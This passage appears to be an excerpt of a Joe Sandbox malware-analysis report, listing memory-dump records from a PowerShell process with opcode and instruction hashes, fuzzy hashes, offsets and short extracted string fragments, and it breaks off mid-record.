                  • Instruction ID: 695f0093280b4a63df2b2ad4f1139de5e848d75fe7e0b93cfa3e4394dfd9c0cf
                  • Opcode Fuzzy Hash: 165503a8dc987b8e9ab209836b5bd269a34697ac097b47edcd19b7ab268310ac
                  • Instruction Fuzzy Hash: F6B13E70E00209DFDB24CFA9D8957ADBBF2AF88354F148529D815EB394EB74A845CF81
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$$q$$q$$q$$q$$q$$q
                  • API String ID: 0-3953147099
                  • Opcode ID: 0cc7cc251d52101bbd8bfec6787b3d386aec717568c971529e8a0ca7fceecf80
                  • Instruction ID: 51d33cc3a3046dee20c40b285a1ba11c9cbfbeb5b33a9e8804d8d24891027024
                  • Opcode Fuzzy Hash: 0cc7cc251d52101bbd8bfec6787b3d386aec717568c971529e8a0ca7fceecf80
                  • Instruction Fuzzy Hash: 53F15C7170434A8FDB25CAA5D8217EA7FB1BF82211F18C4AFD845CB251DB35C846C7A2
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq
                  • API String ID: 0-3075684691
                  • Opcode ID: 1437e16259c0be63cf08f7e205df16a5251246b7a1c8688e2123eafd058f76ab
                  • Instruction ID: 309229061d2228339f91a918f666dfea5d824d579fa7abbea828e4617bf5c986
                  • Opcode Fuzzy Hash: 1437e16259c0be63cf08f7e205df16a5251246b7a1c8688e2123eafd058f76ab
                  • Instruction Fuzzy Hash: 608283B4A01315DFDB24DB94C950B9ABBB2BF89304F1488AED9059B781DB71EC42CF91
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'q$4'q$4'q$4'q$$q$$q$$q$$q$$q$$q
                  • API String ID: 0-4104424984
                  • Opcode ID: 6ee6f480f78509fe29d8c9d2ce8a45635e64392047c1731524fcdbee2edec06c
                  • Instruction ID: 5d35fec8900c36e1ab3ca2908f47367361d32e620b0552ab2e65c2c89a6930f1
                  • Opcode Fuzzy Hash: 6ee6f480f78509fe29d8c9d2ce8a45635e64392047c1731524fcdbee2edec06c
                  • Instruction Fuzzy Hash: E2F14AB1B043468FDB24DAA994117EABBE6BFC6310F14847FD905CB291DB31E841C7A1
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1835233400.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_4740000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 8N/k$Hq$h]/k$h]/k$h]/k$$q$$q$I/k
                  • API String ID: 0-3031600995
                  • Opcode ID: ac367308780d4b708afea981cbf17ee899a8370570d410e7f9114161e67134da
                  • Instruction ID: be19661059bc99ea3b3c56ba3f52dcfb38e59f942c9ffe43630344e346b7fd91
                  • Opcode Fuzzy Hash: ac367308780d4b708afea981cbf17ee899a8370570d410e7f9114161e67134da
                  • Instruction Fuzzy Hash: D9224F30B012188FDB25DB24D8546AEB7F6BFC9304F1584A9D40AAB361DF35AD86CF81
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'q$4'q$$q$$q$$q$$q$$q
                  • API String ID: 0-1894156552
                  • Opcode ID: 852534f654734a4906bb31634ddd77a4787bf7d771b848e1270ecc033994cabe
                  • Instruction ID: 4dc94efd0d6e043d61b7f0b374c1a1514ab1ecbc5652c0788bbd5b1431725921
                  • Opcode Fuzzy Hash: 852534f654734a4906bb31634ddd77a4787bf7d771b848e1270ecc033994cabe
                  • Instruction Fuzzy Hash: F5F15BB170434A8FD725CBA998107EABBA6FFC2211F14847FD945CB642DB31D842C7A1
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'q$4'q$4'q$4'q$4'q$4'q
                  • API String ID: 0-1794337482
                  • Opcode ID: bfbeb223220dd4050eece89e9e99e477f167d5695039dc38a6589a3ad76d756c
                  • Instruction ID: 6c42d6112d29ec3677c380fee750af02abf62d31d372f84b3205f33a8a0d0277
                  • Opcode Fuzzy Hash: bfbeb223220dd4050eece89e9e99e477f167d5695039dc38a6589a3ad76d756c
                  • Instruction Fuzzy Hash: 73D16DB0A012099FDB18DBA4C554B9EBBA2BFC8304F14C86DD9016F395CB76FC468B95
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'q$4'q$4'q$4'q
                  • API String ID: 0-4210068417
                  • Opcode ID: 5054c09e9303d035a12f933bf986c168f9cc66f9538160c08159c2bdda73489e
                  • Instruction ID: 43ba1edd7c26527ca65b772592b37414a297f1de9fcb84366c51548fe3fa8c76
                  • Opcode Fuzzy Hash: 5054c09e9303d035a12f933bf986c168f9cc66f9538160c08159c2bdda73489e
                  • Instruction Fuzzy Hash: 321217F1B043458FDB25DAA898127EA7BA2BFC5211F14887FD5458F791DA32CC42C7A2
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'q$4'q$$q
                  • API String ID: 0-3927140803
                  • Opcode ID: 483e8dd5620718febfc7fd1ca168ea1084eef7ce3e6ecb297ac28ba2cf2c59fe
                  • Instruction ID: 8d5fc5cdb535655d8e4e990ec87635d7490c5a54c51fa99585c156de17605f52
                  • Opcode Fuzzy Hash: 483e8dd5620718febfc7fd1ca168ea1084eef7ce3e6ecb297ac28ba2cf2c59fe
                  • Instruction Fuzzy Hash: 84A137B07043459FDB25DAA488117EA7BA2BFC6314F1884AFD541CB292DF32EC41C7A2
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'q$4'q$4'q
                  • API String ID: 0-3126650252
                  • Opcode ID: 602798804bd6288f2541891cd9fccb94652709e40963b84fe71aceb6412aae9c
                  • Instruction ID: 3edeb399eb333b83cf474af593dea147a334d52457dca3d28ac3715691d84028
                  • Opcode Fuzzy Hash: 602798804bd6288f2541891cd9fccb94652709e40963b84fe71aceb6412aae9c
                  • Instruction Fuzzy Hash: 3DB189B4A012059FDB14DB94C450BEABBB2BF88304F18C46ED9016F396CB36F846CB95
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'q$4'q
                  • API String ID: 0-1467158625
                  • Opcode ID: 2320e6d2ba1410a014bd4b4795045dfe5c1795288a3c589efba6a3e7f957d2c7
                  • Instruction ID: 93dcf5b7ebe3374c9822f819aeb030c93286bd661b3d4cf55203efc330f9d8a3
                  • Opcode Fuzzy Hash: 2320e6d2ba1410a014bd4b4795045dfe5c1795288a3c589efba6a3e7f957d2c7
                  • Instruction Fuzzy Hash: 95724BB4A00305CFDB54CB98C554B9ABBB2FB89304F14C4AAE909AF755CB32ED42CB51
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'q$4'q
                  • API String ID: 0-1467158625
                  • Opcode ID: f55fcb2913a439e41e5d5459e6809f711dd67cbf48132920ed24a549daa350a2
                  • Instruction ID: 82957fd9892fd2d85d919f00527b3fdd4121772034854e05486811aface68c68
                  • Opcode Fuzzy Hash: f55fcb2913a439e41e5d5459e6809f711dd67cbf48132920ed24a549daa350a2
                  • Instruction Fuzzy Hash: FDF16270A012199FEB24DB94C950BAEBBB3BF84304F1084A9E9096F795CB71ED46CF51
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1835233400.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_4740000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: h]/k$I/k
                  • API String ID: 0-199995742
                  • Opcode ID: 37771a340a888af4086a21b672674a6deae7c4cc7a11ac021545ba7ec75f27c0
                  • Instruction ID: b69660427386e30e6c0ae2e1141481efd3d70cd8ea9d01f3e5bccc69771cd0ed
                  • Opcode Fuzzy Hash: 37771a340a888af4086a21b672674a6deae7c4cc7a11ac021545ba7ec75f27c0
                  • Instruction Fuzzy Hash: 4D312A30B011288FCB26DB64C8946EEB7F6BF89304F1144E9D509AB351DB35AE85CF81
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: $q$$q
                  • API String ID: 0-3126353813
                  • Opcode ID: c66099b527b76946ba57cfbb515b4e27a8ce96b44b59d704bb4930ecfaa17896
                  • Instruction ID: 7bf8c6e31f4c810aa6c6f6ce3c7b85181553f02cad01b018f1b06dda0a65b0d7
                  • Opcode Fuzzy Hash: c66099b527b76946ba57cfbb515b4e27a8ce96b44b59d704bb4930ecfaa17896
                  • Instruction Fuzzy Hash: AB11D3F5608B8A9FD756CA94D800BA1BFB5BF83220B1984AFD8048B25BDB31D800C761
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'q
                  • API String ID: 0-1807707664
                  • Opcode ID: 113933f38c7fe5ccbd08c442b2f41a2df174539f33b64393b5e21d629d3d2da0
                  • Instruction ID: 6e1eb71f29a3dee907542cf8238d6835704857246fe207c66a02ebe9b4ad421c
                  • Opcode Fuzzy Hash: 113933f38c7fe5ccbd08c442b2f41a2df174539f33b64393b5e21d629d3d2da0
                  • Instruction Fuzzy Hash: 84425BB4A00205DFDB54CB94C554B9ABBF2FB89304F54C4AAE909AF756CB32ED42CB41
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1835233400.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_4740000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: \V/k
                  • API String ID: 0-13811129
                  • Opcode ID: a97b125ce16018e983782725b488a41c9e486d9e0a8238643034f029316b9a67
                  • Instruction ID: 5ba7f447a13e2bbc967af0eb92cd4f1078c75df75ca6e92aede6b38c8be639b7
                  • Opcode Fuzzy Hash: a97b125ce16018e983782725b488a41c9e486d9e0a8238643034f029316b9a67
                  • Instruction Fuzzy Hash: 75B14F70E00219DFDF20CFA9D9857AEBBF1AF88314F148529E815E7394EB74A845CB91
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'q
                  • API String ID: 0-1807707664
                  • Opcode ID: eb68d46894619de6b5306c06244c295309c96fe165cd4c909a5db5d3f10e38da
                  • Instruction ID: 3bb3fac7bf32649522108492690de12403c41e448213fc6299b74d6291449a17
                  • Opcode Fuzzy Hash: eb68d46894619de6b5306c06244c295309c96fe165cd4c909a5db5d3f10e38da
                  • Instruction Fuzzy Hash: 8D4116F0B04302CFDB24CEA48994BE977E6BF85354F1888AED9058B655DB32ED40CB52
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: tPq
                  • API String ID: 0-789928099
                  • Opcode ID: b27cc375b2f2dd8ffc9bfe19cc066df2537d73372d0cbbc86437804899c476e7
                  • Instruction ID: 6bbe89b4887f58971d38018d57d1adbc7a29bb7a2777b895e53ecbf895c6f386
                  • Opcode Fuzzy Hash: b27cc375b2f2dd8ffc9bfe19cc066df2537d73372d0cbbc86437804899c476e7
                  • Instruction Fuzzy Hash: 9C412BB06093C18FC716CBA49824B9ABFB1BF86210F19C49FD945DF292C631DC45CB91
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: effac3d6ad488a618df80b8ca0fa3c9cc4826032e28fca6a9869a3f695670ea7
                  • Instruction ID: 012b2504484b7058fcc0f650a8509c4e1b38e3d82eb9cb8436e467fa58dad565
                  • Opcode Fuzzy Hash: effac3d6ad488a618df80b8ca0fa3c9cc4826032e28fca6a9869a3f695670ea7
                  • Instruction Fuzzy Hash: 6A122BB4A00205DFDB54CB94C554B9ABBB2FB89304F14C4AEE909AF756CB32ED42CB41
                  Memory Dump Source
                  • Source File: 00000010.00000002.1835233400.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_4740000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 472a97c0fe2fa5ad027f0288e0a81957367293df03af2a6d0b39c6f9cac3e9d5
                  • Instruction ID: a2a0bc84c32e028b8bf2b343173b6461ca79e92f5604df274543beee7cdb18d6
                  • Opcode Fuzzy Hash: 472a97c0fe2fa5ad027f0288e0a81957367293df03af2a6d0b39c6f9cac3e9d5
                  • Instruction Fuzzy Hash: 25E12B74A01218EFDB14CFA8D584AADFBB2FF88314F198559E805AB355D731ED82CB90
                  Memory Dump Source
                  • Source File: 00000010.00000002.1835233400.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_4740000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f8c1e778ccf8907b3edbfb25f0cd740ec87695bac54e23daa67dd27337f11171
                  • Instruction ID: 05e9053afcd47a3f1f62dff02633be8bea35143d9ce4bb3ff82c547bf2b6befa
                  • Opcode Fuzzy Hash: f8c1e778ccf8907b3edbfb25f0cd740ec87695bac54e23daa67dd27337f11171
                  • Instruction Fuzzy Hash: 94D1E474A01259EFDB15CF98D484AADBBF2FF88314F248159E808AB355C731ED82DB91
                  Memory Dump Source
                  • Source File: 00000010.00000002.1835233400.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_4740000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c9cbe1db28f32a908751438ad6fcd88f279552a99f6bb1b9c3c257ba25c973f4
                  • Instruction ID: ddeb8eb0ea93cff5a07a2bce8bad798fb715806b123b368621fb8e1dd8f707d7
                  • Opcode Fuzzy Hash: c9cbe1db28f32a908751438ad6fcd88f279552a99f6bb1b9c3c257ba25c973f4
                  • Instruction Fuzzy Hash: FEC17AB1B002089FDB14DFA4D444AAEBBF6FFC5314F158559E906AB365DB34AC49CB80
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 79082c472c6d3f49a55927ffcccd9464c4c5e0a1a50c95502cbb50916352cba3
                  • Instruction ID: e3dce968931de99a4f100e9276c89d7c614e2fdd0aabdb9c563e32f502bbed36
                  • Opcode Fuzzy Hash: 79082c472c6d3f49a55927ffcccd9464c4c5e0a1a50c95502cbb50916352cba3
                  • Instruction Fuzzy Hash: BBB18CB0A112099FEB14DB94C550B9EBBA3FF89704F50846DE905AF785CB32ED41CB92
                  Memory Dump Source
                  • Source File: 00000010.00000002.1835233400.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_4740000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: acaa2d43a21106f4e13449c7476338d8933e9e45c9348615cbf4012e003be689
                  • Instruction ID: 4a696fb175d78bf5c81a7fcbb922d8614827b52aab8b8a0343ec83e6edba92f6
                  • Opcode Fuzzy Hash: acaa2d43a21106f4e13449c7476338d8933e9e45c9348615cbf4012e003be689
                  • Instruction Fuzzy Hash: 44B16C70E00209DFDB24CFA9D8957ADBBF1AF88354F148529E815EB394EB74A845CF81
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 342972a6f76c7472b9ed97a70da49ae24389a501c64f7b0c72c768267663c5a3
                  • Instruction ID: 1e66726237d6dae8d36ac36318811f53f03b99a103c43f68a54d6ac4d9b12cf2
                  • Opcode Fuzzy Hash: 342972a6f76c7472b9ed97a70da49ae24389a501c64f7b0c72c768267663c5a3
                  • Instruction Fuzzy Hash: 3BA179B4A002059FDB14DB94C590BDEBBB2FF8A304F54846EE5056B792CB32ED45CB92
                  Memory Dump Source
                  • Source File: 00000010.00000002.1835233400.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_4740000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fc4ed6582fa23a12329aacf397336ddada2a08183a6d4de1672b275a30584e99
                  • Instruction ID: 442d5d54f6ab0554eff50b81670a0312fde47072f8e12e41dafc4a1cb965fa01
                  • Opcode Fuzzy Hash: fc4ed6582fa23a12329aacf397336ddada2a08183a6d4de1672b275a30584e99
                  • Instruction Fuzzy Hash: 50916B74A006058FCB15CF99C494ABAFBB2FF89310B248599E855AB3A6C335FC51CF90
                  Memory Dump Source
                  • Source File: 00000010.00000002.1835233400.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_4740000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8da22080914f810d3ee66f60d3eead2a18da950fbe13684bf91701e3644b5ab3
                  • Instruction ID: 870b4c63056b29de0054e2063f486b45ccf50443c9360dd1f2d00773f090e411
                  • Opcode Fuzzy Hash: 8da22080914f810d3ee66f60d3eead2a18da950fbe13684bf91701e3644b5ab3
                  • Instruction Fuzzy Hash: FE81DF34A05218DFCB15EFA8C4849ADBBF2FF89314F1985A9E405AB362CB35EC45CB51
                  Memory Dump Source
                  • Source File: 00000010.00000002.1835233400.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_4740000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bc6e34788e360cc1be21a2e5a1b444926499167a293c5e042a3f1c7a73167d81
                  • Instruction ID: cd48234e2c66aeb70103c74117704413b875ce88140b551f245f5f7f12a12253
                  • Opcode Fuzzy Hash: bc6e34788e360cc1be21a2e5a1b444926499167a293c5e042a3f1c7a73167d81
                  • Instruction Fuzzy Hash: D271AD70A01219CFDB24CF68D884AAEBBF2FF85314F148569D456DB7A1DB71AC46CB80
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 462bba9a9f91919bdc65b9140cf537045133bb4c876bdf4977d14334079eaa4f
                  • Instruction ID: 9d939984b1064977472a5d21b13afbf0bc1221dca489d6653d84bca7fdb13275
                  • Opcode Fuzzy Hash: 462bba9a9f91919bdc65b9140cf537045133bb4c876bdf4977d14334079eaa4f
                  • Instruction Fuzzy Hash: F5716BB4A01205DFEB14CF94C855BAABBB2BF89310F14856ED805AF755CB32EC42CB91
                  Memory Dump Source
                  • Source File: 00000010.00000002.1835233400.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_4740000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 56c7d4866bc4b43a1df9fd8b8a30e3b7e3ae408177df045ca0a99bbf3206033f
                  • Instruction ID: 9473aee40a4a25dc936f2ed165cebfc57d6cd445d3c2e80e1d44a7ce06afbd26
                  • Opcode Fuzzy Hash: 56c7d4866bc4b43a1df9fd8b8a30e3b7e3ae408177df045ca0a99bbf3206033f
                  • Instruction Fuzzy Hash: 5D715E70A00218DFDB14DFB5D454BAEBBF2BF88308F148429D415AB7A0DB74AD4ACB51
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3356e7b17a8dfbf9b2ae725496276d8abe920f88458107054b088d5fac72a143
                  • Instruction ID: afa0f8dcec8fbc4e63e028149f01db6390eacf83baf10ea750a41e909361a0ac
                  • Opcode Fuzzy Hash: 3356e7b17a8dfbf9b2ae725496276d8abe920f88458107054b088d5fac72a143
                  • Instruction Fuzzy Hash: 636137B4A01206DFDB14CF94C855BEABBB2BF89310F15C56ED8056B752CB32E841CB91
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5052f3e190ef2a6a588e81443b364a3c93531f9befc8a2e7f9d1eb1aa8501b4a
                  • Instruction ID: 4d6d327dd38d644c69b1e200d425f8b7fa884ade9f01845761faa103d4fa2018
                  • Opcode Fuzzy Hash: 5052f3e190ef2a6a588e81443b364a3c93531f9befc8a2e7f9d1eb1aa8501b4a
                  • Instruction Fuzzy Hash: D35139B4A01206DFDB14CF94C955BE9BBB2BF89314F15C56ED804AB752CB32E881CB91
                  Memory Dump Source
                  • Source File: 00000010.00000002.1849632617.0000000008260000.00000040.00000800.00020000.00000000.sdmp, Offset: 08260000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_8260000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3699723f8ad58c8154761bf41506171a76d7013c5860f1192d033f72d21672e5
                  • Instruction ID: 753641f55a05871df87f99d491f28d2fcdd38b617f398d8789d7fbc2e34b601b
                  • Opcode Fuzzy Hash: 3699723f8ad58c8154761bf41506171a76d7013c5860f1192d033f72d21672e5
                  • Instruction Fuzzy Hash: 35519230A053458FDB06CF98C894AADBFB1FF49310F15419BD8419B362D735AC55CBA5
                  Memory Dump Source
                  • Source File: 00000010.00000002.1835233400.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_4740000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ce267c01f9bcedf4265c5c2d368198261a343bcca55ec5783d6365c169af3f32
                  • Instruction ID: 84b1f8e99ed689bdb554563220ceb86ab1916144dc71287b712d1c84f459eb19
                  • Opcode Fuzzy Hash: ce267c01f9bcedf4265c5c2d368198261a343bcca55ec5783d6365c169af3f32
                  • Instruction Fuzzy Hash: E0515CB1A042199FEB24DF75C8546AEBBF2FF85308F148429D506AB790DBB4AC45CB50
                  Memory Dump Source
                  • Source File: 00000010.00000002.1847343091.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_75c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a7b8d05be0c9be2886c412cca5d1480d9e4683b85f4f1835dfd6c22792d15d38
                  • Instruction ID: 949bc26c9793c4b73b74c7fb92c0c7153be66ee83751877ea6acf09439d5f2cc
                  • Opcode Fuzzy Hash: a7b8d05be0c9be2886c412cca5d1480d9e4683b85f4f1835dfd6c22792d15d38
                  • Instruction Fuzzy Hash: AE4129F1B053419FDB20CFA48412BFE7BA2BF81251F5884AFD8049F651C632C985C7A2
                  Memory Dump Source
                  • Source File: 00000010.00000002.1849632617.0000000008260000.00000040.00000800.00020000.00000000.sdmp, Offset: 08260000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_8260000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3e5e263f3276f53398218a46184c9a8112c23a42d643d7022a57a3f90d285625
                  • Instruction ID: e27cadabd3a2fa33432070310ba09d499eaf71cd735f5769bbf9055d44dd0504
                  • Opcode Fuzzy Hash: 3e5e263f3276f53398218a46184c9a8112c23a42d643d7022a57a3f90d285625
                  • Instruction Fuzzy Hash: D0411B74A00209DFDB15CF98C494AAEBBB1FF48320F25866AD945AB364D735EC91CB90
                  Memory Dump Source
                  • Source File: 00000010.00000002.1835233400.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_4740000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 66977c1fef892c69d9b4253046e82169fca7335b68752ffe265125d994878360
                  • Instruction ID: 16708b0b829b4aaff1bec11554ca17c5398361f905260b7637078303a523fd74
                  • Opcode Fuzzy Hash: 66977c1fef892c69d9b4253046e82169fca7335b68752ffe265125d994878360
                  • Instruction Fuzzy Hash: B0417CB1A002048FDB259B34C458ABE7BF2FFC9715F054068E502EB7A0DB74AC45DB50
                  Memory Dump Source
                  • Source File: 00000010.00000002.1835233400.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_4740000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3f71b1c8286182dabba532f237f764c686ebd9764c12e6fc821a14f0ff3cb6ea
